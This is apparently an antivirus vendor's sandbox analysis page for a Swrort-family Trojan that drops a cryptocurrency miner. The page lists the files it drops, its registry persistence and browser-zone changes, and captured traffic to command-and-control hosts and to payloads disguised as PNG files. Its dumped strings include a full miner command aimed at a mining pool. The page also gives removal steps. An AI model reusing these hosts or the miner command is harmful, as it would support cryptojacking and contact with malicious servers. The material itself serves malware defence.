Trojan.Win32.Swrort.3_204939cf63 – Adaware

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

0003F.tmp.exe:1500
%original file name%.exe:1836

The Trojan injects its code into the following process(es):

%original file name%.exe:640
minerd.exe:364

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:640 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@google[2].txt (647 bytes)
%Documents and Settings%\%current user%\Application Data\675F5D2DB02D8342A557D0A4ECB70B5C (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll (695 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\google[1].htm (22921 bytes)
%Documents and Settings%\%current user%\Application Data\31t1R8LPnv1UOeL1ygYGsn0w0VCT02Y (604 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\888256212[1].png (139281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (45505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\846767599[1].png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll (1744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\minerd.exe (696 bytes)
%Documents and Settings%\%current user%\Application Data\7425110477C00FBB20E6CF9BB432D760 (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\562309044[1].png (139281 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (896 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\xncqnyyorsxlq.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe (696 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (0 bytes)

Registry activity

The process 0003F.tmp.exe:1500 makes changes in the system registry.

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"WINSXS32"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WINSXS32"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WINSXS32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WINSXS32"

The process %original file name%.exe:640 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF B2 08 ED 19 F4 D8 3A 08 CE A1 F7 59 C7 2F 06"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"toexrjunjmxmfsfluiznsagzgviplr" = "%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1836 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 9C 07 5D EF F6 B5 55 E4 20 15 4E E3 EE 30 84"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1402115051"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"

The process minerd.exe:364 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 0E 2B E0 B3 5E 71 F6 03 B0 96 15 E8 8A 93 8A"

Dropped PE files

MD5	File path
b3b52fec86b2f0602e4ee6726cedb475	c:\Documents and Settings\"%CurrentUserName%"\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll
ac05fbba61f939cd90133032f2595c69	c:\Documents and Settings\"%CurrentUserName%"\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
0003F.tmp.exe:1500
%original file name%.exe:1836
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Cookies\Current_User@google[2].txt (647 bytes)
%Documents and Settings%\%current user%\Application Data\675F5D2DB02D8342A557D0A4ECB70B5C (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0003F.tmp.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\pthreadGC2.dll (695 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\google[1].htm (22921 bytes)
%Documents and Settings%\%current user%\Application Data\31t1R8LPnv1UOeL1ygYGsn0w0VCT02Y (604 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\888256212[1].png (139281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00040.tmp.exe (45505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\846767599[1].png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\libcurl.dll (1744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796\minerd.exe (696 bytes)
%Documents and Settings%\%current user%\Application Data\7425110477C00FBB20E6CF9BB432D760 (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\562309044[1].png (139281 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@google[1].txt (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (896 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\xncqnyyorsxlq.exe (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe (696 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"toexrjunjmxmfsfluiznsagzgviplr" = "%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	39679	39936	4.49839	79a4a2e4dcaf9a3aeeee6e2782378240
.rdata	45056	16206	16384	3.62658	70c87e14c493e857c346d7b32c1713c4
.data	61440	19628	7680	4.01315	bfdf697f4ba0816dbcf9330733889a0a
.855645	81920	36	512	0.49456	4305edff9a269f78669d34a099c4bf1f
.41d3359	86016	36	512	0.495582	0d37efda672e26ceb5f6ff7e7ae2a1af
.c3a6f7	90112	4	512	0.056519	d46190223de12e4e4a1db0b9c8d15584
.rsrc	94208	28792	29184	4.76706	7282b099135755d52d4a881e04ea2936

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://carpetbrownsurface.com/index.php
hxxp://www5.0zz0.com/2014/05/28/22/846767599.png
hxxp://google.com/
hxxp://www.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw
hxxp://www6.0zz0.com/2014/05/29/00/888256212.png
hxxp://www13.0zz0.com/2014/05/29/00/562309044.png

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /2014/05/29/00/888256212.png HTTP/1.1

Host: www6.0zz0.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 03 Jul 2014 17:02:38 GMT

Server: Apache

Last-Modified: Thu, 29 May 2014 00:16:18 GMT

ETag: "d71032a-468a9-d67a3880"

Accept-Ranges: bytes

Content-Length: 288937

Connection: close

Content-Type: image/png

ZS...vH......Q6..HciO..z9..F.......7..6E.~jx)Wn...._. .quA.]9..S.$RS...H^N...`n.~..z8..z...vHuX\.....~QpPU...L@l..g...r'w...b.......^W.'......3..!.-....]qb...y|...f.....6.s.2......<.t...S>..H.D.N..@f.bu3z...^N.X.[S. Ds....0d=....!.{..(?Pz.V.}....73.....d...F........[.d?.|J.b....chE.n1..[.o*tvb.\s..8.....b.O..'`v...7..tq.........6XS......@....Q6..H.X.&...n...................-..........s..$$......H....d...f...<x.c..iA.p=..J(Ic.T[<.JE{._.R...............B/......O5..y...,J.|[..pWT...c.`..........!.ix..b@.sn....H.X.i.......rVh.2z.h....]....i.....m..r.T-0..........I...`.H.......^Qr.A...]hQq.r.h.nD..e.)B.y$.`.R38.AM):......'...(}...*....b.I.f|.....8..,.......`8.\z.....h....\..r...`.mh..8,.D...."...@.O9..*$N.%.1....d'-.....qg.`y...w6f..j..2&......w ...|...}..J.u.......}...cxFL09X...............,...-[aT./N..H..U..6..V..F.Z...U.(.j..C.....(.-..W..M...#VYGRl.?..7&..a......h\.. .....z._SO..04....*.U...}/.k<Y:.a..HH......h...B...e.6`.f.. ...........lh.".....]......`.Q.R........u../..=..a...2..........Cz.`...L..s.....HV*.b.[.)&......|^7c.......a.....v.#H..yC.l.^G.t.G...S.'...pF..G..:G...lG2a....9*... ..R..F....NrW.0.f#.....s0y...5.a..\1M....TP......Z..:..........t.,.]FA.....B-.c..s]/.I.....#N.YQ..U..18JA..>.`....?.;G.tz.G?.......NM.....C^3.........Z0....-3.J..7....B..xvp..V..]....T.K.......QeX...d.G..aB..1.L...2..q0.A.j(..U..O_..p..B...G....,J.q.k%.|..?8...D..X8.6.1L4..`W.uc.K...:.....S...;....c,&.aV.........M..~ ...p....Kz.t...l.....T.-h.M.......W....^>"...h.r.:L.!..(S.....].7...D.`.]~..~GC..@.n.....%..

<<

<<< skipped >>>

GET /2014/05/29/00/562309044.png HTTP/1.1

Host: www13.0zz0.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 03 Jul 2014 17:02:37 GMT

Server: Apache

Last-Modified: Thu, 29 May 2014 00:16:44 GMT

ETag: "71702c3-468a9-d806f300"

Accept-Ranges: bytes

Content-Length: 288937

Connection: close

Content-Type: image/png

ZS...vH......Q6..HciO..z9..F.......7..6E.~jx)Wn...._. .quA.]9..S.$RS...H^N...`n.~..z8..z...vHuX\.....~QpPU...L@l..g...r'w...b.......^W.'......3..!.-....]qb...y|...f.....6.s.2......<.t...S>..H.D.N..@f.bu3z...^N.X.[S. Ds....0d=....!.{..(?Pz.V.}....73.....d...F........[.d?.|J.b....chE.n1..[.o*tvb.\s..8.....b.O..'`v...7..tq.........6XS......@....Q6..H.X.&...n...................-..........s..$$......H....d...f...<x.c..iA.p=..J(Ic.T[<.JE{._.R...............B/......O5..y...,J.|[..pWT...c.`..........!.ix..b@.sn....H.X.i.......rVh.2z.h....]....i.....m..r.T-0..........I...`.H.......^Qr.A...]hQq.r.h.nD..e.)B.y$.`.R38.AM):......'...(}...*....b.I.f|.....8..,.......`8.\z.....h....\..r...`.mh..8,.D...."...@.O9..*$N.%.1....d'-.....qg.`y...w6f..j..2&......w ...|...}..J.u.......}...cxFL09X...............,...-[aT./N..H..U..6..V..F.Z...U.(.j..C.....(.-..W..M...#VYGRl.?..7&..a......h\.. .....z._SO..04....*.U...}/.k<Y:.a..HH......h...B...e.6`.f.. ...........lh.".....]......`.Q.R........u../..=..a...2..........Cz.`...L..s.....HV*.b.[.)&......|^7c.......a.....v.#H..yC.l.^G.t.G...S.'...pF..G..:G...lG2a....9*... ..R..F....NrW.0.f#.....s0y...5.a..\1M....TP......Z..:..........t.,.]FA.....B-.c..s]/.I.....#N.YQ..U..18JA..>.`....?.;G.tz.G?.......NM.....C^3.........Z0....-3.J..7....B..xvp..V..]....T.K.......QeX...d.G..aB..1.L...2..q0.A.j(..U..O_..p..B...G....,J.q.k%.|..?8...D..X8.6.1L4..`W.uc.K...:.....S...;....c,&.aV.........M..~ ...p....Kz.t...l.....T.-h.M.......W....^>"...h.r.:L.!..(S.....].7...D.`.]~..~GC..@.n.....%..

<<

<<< skipped >>>

POST /index.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: 4C9B53A8086004515190B6B74733CD51

Host: carpetbrownsurface.com

Content-Length: 175

Cache-Control: no-cache

0=D4DD6EBD91&1=0&2=A7BE76C69182033329D77E&3=B0BE2CF2D2B8134E4FBE0E8E3DAA&4=AF9D2FF6CCF5613439A12AC11ACB754E1F10368B349407C22F0E555EB6C25950F4E3DB52CCD4EF9C615AE3B0CEF613&5=&6=

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Thu, 03 Jul 2014 16:54:19 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.4-14 deb7u9

258....[...3...O.$s.4?S..|.S.5.Z...L;...R....|F....Y....H.R..V.[.....:....d)..o.W....r..9-\,e2e.).*. .)&8%...........%_^.G......hGn. ..u......$.h..3.H..E!..#.].I.e.p8...]_.H.T@.~..\'..x.{AX.M..".........5s.%..N:.....g.t{....U....>.i.qJRm...R.cl/!.v..(....Z.H.M|.D.PZ.......@.....^....Y.F.m....o>O.9........z.j.. b#../.N.2}_e..E9.a..hA=b........t.:.ZE.;.....j..q......{$R....8Z..M........a//..kC ....u.F.w..(.7.j......|..'..i..O....T.d]U..8^..U.\....N.K.H...u.<....Z ..$.....'a.Q`.QO...[.@ *)...D.....o...H.m.%.i..8.!..1....w..}.......X...nM.r......&..//..G.....3.D..M.....K..s.4....A.a....!,......lH...7 ...0..

GET / HTTP/1.1

Host: google.com

Cache-Control: no-cache

HTTP/1.1 302 Found

Cache-Control: private

Content-Type: text/html; charset=UTF-8

Location: hXXp://VVV.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw

Content-Length: 258

Date: Thu, 03 Jul 2014 17:02:42 GMT

Server: GFE/2.0

Alternate-Protocol: 80:quic

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.ca/?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw">here</A>...</BODY></HTML>....

GET /2014/05/28/22/846767599.png HTTP/1.1

Host: www5.0zz0.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 03 Jul 2014 17:02:35 GMT

Server: Apache

Last-Modified: Wed, 28 May 2014 22:59:13 GMT

Accept-Ranges: bytes

Content-Length: 4608

Connection: close

Content-Type: image/png

..#./.7..@.W..^.........M..K.W...m........R....@.--......Zy.......G.........Xm........(..]....-....'...j0.bs...w....d.......D9.u%......S!.}...:......o....I<Rc;....Mb..q...v}..R....Y......vl.b.H .#.O;.F....D.....X...z...c:n...&p.0....}O..Ox9G..:.I.mV.._B.&.5%..`.0LM.......C.2....U...7......LS[..@.f.n.... ...........Q......Oy.E..^.T...x.%.....g..58=....Q.%.....t..........$.{...*.~.nm.....$.E....n...88p.....9.o-.s.q.i...MP....S..R.4.oCz.*.....g.df...X'..;....?~..K.B.(....@.T. .........n.A@.....~.d...]8..R.f...0.T.....i..<.h....A..`............].o...!..Xqa8..5Wc@.L=.&.%.p.@..U'....<..3..4H7.u..V....j...\...v.Sv*s.j..V=.V...K.vUd....){.._Q....V26.=.].Y$*...M3j..Jw`...B..!1..)....JL...A......P........?@...d.$......ye..1.....r.e.e......a`...-U$.<..>...9.%<Z.8.}..g.=....^....p.K..%.....]....$)......G...o.\.~.<c.4?9a....P.@....N.)7..0%h...h..u.D..Q.0..G4.....}.....;8..UA.sAV.H...........<...?fs...N$...Br a.vx.....y.....(...........CRJgf......0...-......~.'......Vw...y.....&.!!...{A.G.[.d.....Xc.b4..:vw*.......i.......G...x.....U|.cd,.@..~e..IT~.g?.4.{.po.....!.[p....1.v.\......'.'. 3.>.9.........7O......d28....................*..*gH .8...O..!\.?D......=.Iyq..^...j...f..`.$F....(R.,..'...U.3..:Y...4..X....a...v..:.......8..j.^...;......Q..:b..... 5....m.KoA......>q....16.e#32.<Ty.......9..q..G..5....5......mu..3.y.....W.....K....*.gH...<%-...@.b...!.{^.....7.9..7.}y...`......?Ma.(...X .M.Z.C4J...|..5.:..do...N.IJ.F{....../..x7}BH."..Q....v.F...... .]..:-_b..&....!.-...d.....f\.....O...

<<

<<< skipped >>>

GET /?gfe_rd=cr&ei=soy1U7_BCq7b8gf51oCQAw HTTP/1.1

Host: VVV.google.ca

Cache-Control: no-cache

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Thu, 03 Jul 2014 17:02:42 GMT

Expires: -1

Cache-Control: private, max-age=0

Content-Type: text/html; charset=ISO-8859-1

Set-Cookie: PREF=ID=a925c378d21ce293:FF=0:TM=1404406962:LM=1404406962:S=KArret2NkGUXTIqS; expires=Sat, 02-Jul-2016 17:02:42 GMT; path=/; domain=.google.ca

Set-Cookie: NID=67=BoS7-YpbkZYYxrZzYwTQm7_Eq70VeqxwWULcrm4HbSYyV4u7QEL-lisxKUuFWiBmnSrvSwXutG5XPxcnG663bxQ6eFoPkEdaP9PFL7SOpMcZ5UeObC5efZKJkZtaXdfM; expires=Fri, 02-Jan-2015 17:02:42 GMT; path=/; domain=.google.ca; HttpOnly

P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."

Server: gws

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Alternate-Protocol: 80:quic

Transfer-Encoding: chunked

8000..<!doctype html><html itemscope="" itemtype="hXXp://schema.org/WebPage" lang="en-CA"><head><meta content="/images/google_favicon_128.png" itemprop="image"><title>Google</title><script>(function(){.window.google={kEI:"soy1U_T9DaPksASZnIGoAw",getEI:function(a){for(var c;a&&(!a.getAttribute||!(c=a.getAttribute("eid")));)a=a.parentNode;return c||google.kEI},https:function(){return"https:"==window.location.protocol},kEXPI:"4791,4896,17259,4000116,4007661,4007830,4008142,4009033,4009641,4010806,4010858,4010899,4011228,4011258,4011679,4012373,4012504,4013395,4013414,4013591,4013723,4013787,4013823,4013920,4013967,4013979,4014016,4014093,4014431,4014515,4014637,4014671,4014804,4014991,4015234,4015236,4015260,4015266,4015550,4015587,4015633,4015772,4015989,4016127,4016309,4016367,4016372,4016487,4016824,4016855,4016976,4017162,4017204,4017280,4017285,4017544,4017554,4017579,4017595,4017612,4017639,4017681,4017694,4017710,4017742,4017789,4017818,4017881,4017894,4017902,4017913,4017981,4017982,4018009,4018019,4018030,4018126,4018159,4018283,4018363,4018416,4018480,4018511,4018519,4018532,4018542,4018554,4018569,4018621,4018638,4018757,4018834,4018914,4018923,4018933,4018949,4019005,4019037,4019074,4019084,4019142,4019184,4019191,4019200,4019205,4019268,4019281,4019387,4019415,4019423,4019427,4019429,4019438,4019661,8300007,8300012,8300027,8300057,8500223,8500256,8500272,8500306,8500357,8500365,8500394,8500421,8500433,8500444,8500462,8500470,8500472,8500495,10200044,10200083,1

<<

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_640:

.text

`.rdata

@.data

user32.dll

kernel32.dll

ShellExecuteW

shell32.dll

ole32.dll

RegCloseKey

RegOpenKeyExW

advapi32.dll

HttpOpenRequestW

HttpSendRequestW

InternetOpenUrlW

wininet.dll

|PAM-U1_0.0.1

Content-Type: application/x-www-form-urlencoded

http://www5.0zz0.com/2014/05/28/22/846767599.png

Shttp://google.com/

http://www6.0zz0.com/2014/05/29/00/888256212.png

http://www13.0zz0.com/2014/05/29/00/562309044.png

minerd.exe

minerd.exe -a scrypt -o stratum tcp://cococairports.com:8081 -u flywifi101.1 -p x

ntdll.dll

0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s

0=%s&1=%s

%s\%s

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

calc.exe

/index.php

HTTP/1.1

carpetbrownsurface.com

roofingropers.com

greenalgeaocean.com

%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe

@c:\%original file name%.exe

%Documents and Settings%\%current user%\Start Menu\Programs\Startup

%Documents and Settings%\%current user%\Application Data

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

%System%

xncqnyyorsxlq.exe

wbohuxzhxt.exe

%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796

libcurl.dll

2.5.1

%original file name%.exe_640_rwx_00330000_00004000:

.rdart

32.dl

2<3=4>5?6?7?8

ntdll.dll

%original file name%.exe_640_rwx_00340000_00021000:

.rdart

32.dl

2<3=4>5?6?7?8

%original file name%.exe_640_rwx_00370000_00033000:

.text

`.rdata

@.data

user32.dll

kernel32.dll

ShellExecuteW

shell32.dll

ole32.dll

RegCloseKey

RegOpenKeyExW

advapi32.dll

HttpOpenRequestW

HttpSendRequestW

InternetOpenUrlW

wininet.dll

AM-U1_0.0.1

Content-Type: application/x-www-form-urlencoded

ntdll.dll

0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s

0=%s&1=%s

%s\%s

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

calc.exe

/index.php

HTTP/1.1

carpetbrownsurface.com

roofingropers.com

greenalgeaocean.com

%original file name%.exe_640_rwx_00400000_00036000:

.text

`.rdata

@.data

user32.dll

kernel32.dll

ShellExecuteW

shell32.dll

ole32.dll

RegCloseKey

RegOpenKeyExW

advapi32.dll

HttpOpenRequestW

HttpSendRequestW

InternetOpenUrlW

wininet.dll

|PAM-U1_0.0.1

Content-Type: application/x-www-form-urlencoded

http://www5.0zz0.com/2014/05/28/22/846767599.png

Shttp://google.com/

http://www6.0zz0.com/2014/05/29/00/888256212.png

http://www13.0zz0.com/2014/05/29/00/562309044.png

minerd.exe

minerd.exe -a scrypt -o stratum tcp://cococairports.com:8081 -u flywifi101.1 -p x

ntdll.dll

0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s

0=%s&1=%s

%s\%s

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

calc.exe

/index.php

HTTP/1.1

carpetbrownsurface.com

roofingropers.com

greenalgeaocean.com

%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe

@c:\%original file name%.exe

%Documents and Settings%\%current user%\Start Menu\Programs\Startup

